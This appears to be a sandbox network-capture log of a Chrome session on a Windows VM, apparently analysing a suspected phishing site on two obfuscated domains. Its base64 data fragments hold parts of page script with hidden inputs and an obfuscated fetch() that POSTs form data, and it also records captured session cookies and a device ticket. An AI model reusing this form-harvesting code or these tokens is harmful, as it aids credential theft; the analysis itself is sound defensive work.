                  2024-03-07 18:13:15 UTC1369INData Raw: 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6b 31 76 65 6d 6c 73 62 47 45 76 4e 53 34 77 49 43 68 58 61 57 35 6b 62 33 64 7a 49 45 35 55 49 44 45 77 4c 6a 41 37 49 46 64 70 62 6a 59 30 4f 79 42 34 4e 6a 51 70 49 45 46 77 63 47 78 6c 56 32 56 69 53 32 6c 30 4c 7a 55 7a 4e 79 34 7a 4e 69 41 6f 53 30 68 55 54 55 77 73 49 47 78 70 61 32 55 67 52 32 56 6a 61
                  Data Ascii: xpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja
                  2024-03-07 18:13:15 UTC1092INData Raw: 6f 4b 47 52 72 56 6d 68 75 64 6d 4e 4e 61 57 6b 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6c 42 50 55 31 51 69 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 48 64 6a 54 55 64 45 61 6c 64 57 56 55 63 70 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43
                  Data Ascii: oKGRrVmhudmNNaWksIHsNCiAgICAgICAgICAgIG1ldGhvZDogIlBPU1QiLA0KICAgICAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKHdjTUdEaldWVUcpDQogICAgICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICAgICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgIC
                  2024-03-07 18:13:15 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.649720104.21.24.1124434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:15 UTC1326OUTGET /favicon.ico HTTP/1.1
                  Host: 0xl45.ateros1.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: no-cors
                  Sec-Fetch-Dest: image
                  Referer: https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
                  2024-03-07 18:13:16 UTC719INHTTP/1.1 404 Not Found
                  Date: Thu, 07 Mar 2024 18:13:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  Cache-Control: max-age=14400
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Vary: Accept-Encoding
                  alt-svc: h3=":443"; ma=86400
                  CF-Cache-Status: MISS
                  Server: cloudflare
                  CF-RAY: 860c8ef6f9d50ad1-LAS
                  2024-03-07 18:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.649724104.21.14.174434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:16 UTC636OUTGET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1
                  Host: g461z.scharb9.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: */*
                  Origin: https://0xl45.ateros1.com
                  Sec-Fetch-Site: cross-site
                  Sec-Fetch-Mode: cors
                  Sec-Fetch-Dest: empty
                  Referer: https://0xl45.ateros1.com/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:17 UTC610INHTTP/1.1 200 OK
                  Date: Thu, 07 Mar 2024 18:13:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ayKxNgj9bvyl8bOtMq1HDQTA7J9tBEnH3IUzKFt0j4QPhph27xYB7cgkO25sdxU5pRdp7zapgQrS1Eec79DDkUS6KIXDz4GzWJ90v%2FemVnIX6WzxZ18SrSvVA85%2FNL0Z0sRDBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 860c8efb287909fd-LAS
                  alt-svc: h3=":443"; ma=86400
                  2024-03-07 18:13:17 UTC6INData Raw: 31 0d 0a 31 0d 0a
                  Data Ascii: 11
                  2024-03-07 18:13:17 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.64972535.190.80.14434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:17 UTC528OUTOPTIONS /report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Origin: https://0xl45.ateros1.com
                  Access-Control-Request-Method: POST
                  Access-Control-Request-Headers: content-type
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:17 UTC336INHTTP/1.1 200 OK
                  Content-Length: 0
                  access-control-max-age: 86400
                  access-control-allow-methods: OPTIONS, POST
                  access-control-allow-origin: *
                  access-control-allow-headers: content-length, content-type
                  date: Thu, 07 Mar 2024 18:13:17 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.649726104.21.24.1124434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:17 UTC1538OUTGET /zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk HTTP/1.1
                  Host: 0xl45.ateros1.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-Dest: document
                  Referer: https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
                  2024-03-07 18:13:20 UTC669INHTTP/1.1 404 Not Found
                  Date: Thu, 07 Mar 2024 18:13:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  alt-svc: h3=":443"; ma=86400
                  Server: cloudflare
                  CF-RAY: 860c8f028f110a03-LAS
                  2024-03-07 18:13:20 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.649728104.21.14.174434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:17 UTC428OUTGET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1
                  Host: g461z.scharb9.com
                  Connection: keep-alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: */*
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: cors
                  Sec-Fetch-Dest: empty
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:18 UTC614INHTTP/1.1 200 OK
                  Date: Thu, 07 Mar 2024 18:13:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RWNneWw4ApjoFI8Hf86U4BJT8MSxEyt%2FCHWaywlAveIFMDKrCxAsJ6%2FFZdxgdYth%2FBhaM6wK0%2Bllgordl9q3lR8yg5VwHVugXTEwLQo7u78L3DWAk3GOS2YLaRZb0JLSzwSjMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 860c8f041bdc09f7-LAS
                  alt-svc: h3=":443"; ma=86400
                  2024-03-07 18:13:18 UTC6INData Raw: 31 0d 0a 31 0d 0a
                  Data Ascii: 11
                  2024-03-07 18:13:18 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.64972935.190.80.14434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:18 UTC468OUTPOST /report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Content-Length: 437
                  Content-Type: application/reports+json
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:18 UTC437OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 38 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 30 78 6c 34 35 2e 61 74 65 72 6f 73 31 2e 63 6f 6d 2f 4f 70 4c 7a 31 36 41 31 76 35 47 63 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 34 2e 31 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b
                  Data Ascii: [{"age":1,"body":{"elapsed_time":683,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://0xl45.ateros1.com/OpLz16A1v5Gc/","sampling_fraction":1.0,"server_ip":"104.21.24.112","status_code":404,"type":"http.error"},"type":"network
                  2024-03-07 18:13:18 UTC168INHTTP/1.1 200 OK
                  Content-Length: 0
                  date: Thu, 07 Mar 2024 18:13:17 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.64973023.202.57.177443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:18 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  User-Agent: Microsoft BITS/7.8
                  Host: fs.microsoft.com
                  2024-03-07 18:13:18 UTC466INHTTP/1.1 200 OK
                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                  Content-Type: application/octet-stream
                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                  Server: ECAcc (sac/254A)
                  X-CID: 11
                  X-Ms-ApiVersion: Distribute 1.2
                  X-Ms-Region: prod-eus-z1
                  Cache-Control: public, max-age=90753
                  Date: Thu, 07 Mar 2024 18:13:18 GMT
                  Connection: close
                  X-CID: 2


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.64973123.202.57.177443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                  Range: bytes=0-2147483646
                  User-Agent: Microsoft BITS/7.8
                  Host: fs.microsoft.com
                  2024-03-07 18:13:19 UTC520INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                  ApiVersion: Distribute 1.1
                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                  X-MSEdge-Ref: Ref A: CC1186E36C704BA5AF8177F229D6CC87 Ref B: PAOEDGE0621 Ref C: 2023-04-04T13:32:33Z
                  Cache-Control: public, max-age=90704
                  Date: Thu, 07 Mar 2024 18:13:19 GMT
                  Content-Length: 55
                  Connection: close
                  X-CID: 2
                  2024-03-07 18:13:19 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                  Session IDSource IPSource PortDestination IPDestination Port
                  10192.168.2.64973220.10.31.115443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 34 72 49 58 35 4f 65 55 6b 61 65 73 48 48 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 64 65 66 36 38 39 30 34 62 66 63 38 37 37 39 0d 0a 0d 0a
                  Data Ascii: CNT 1 CON 305MS-CV: F4rIX5OeUkaesHHS.1Context: ddef68904bfc8779
                  2024-03-07 18:13:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:13:22 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 46 34 72 49 58 35 4f 65 55 6b 61 65 73 48 48 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 64 65 66 36 38 39 30 34 62 66 63 38 37 37 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 49 33 72 34 38 50 7a 2b 64 36 32 4d 44 62 6a 62 39 6d 49 4e 2b 4b 6e 71 69 4d 41 46 78 59 55 37 73 50 70 38 4f 76 58 6a 52 4d 65 67 46 53 48 48 38 2f 57 48 35 6f 51 76 6b 4c 4f 38 51 6f 7a 53 6e 4b 37 41 34 2b 4f 52 33 31 43 37 42 42 51 7a 45 72 64 73 76 4f 4f 46 62 73 55 67 67 35 54 6e 52 41 47 76 6a 44 42 36 73 63 6d 43
                  Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: F4rIX5OeUkaesHHS.2Context: ddef68904bfc8779<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:13:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 46 34 72 49 58 35 4f 65 55 6b 61 65 73 48 48 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 64 65 66 36 38 39 30 34 62 66 63 38 37 37 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: F4rIX5OeUkaesHHS.3Context: ddef68904bfc8779<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:13:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:13:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 64 4f 48 4e 4c 6e 35 37 7a 6b 61 2b 4b 30 39 42 7a 53 7a 52 43 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                  Data Ascii: MS-CV: dOHNLn57zka+K09BzSzRCw.0Payload parsing failed.


                  Session IDSource IPSource PortDestination IPDestination Port
                  11192.168.2.64973520.10.31.115443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:36 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 2f 62 59 63 35 4f 50 69 45 6d 55 48 63 52 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 35 35 31 34 38 33 37 64 36 64 38 36 66 31 0d 0a 0d 0a
                  Data Ascii: CNT 1 CON 305MS-CV: g/bYc5OPiEmUHcRL.1Context: 145514837d6d86f1
                  2024-03-07 18:13:36 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
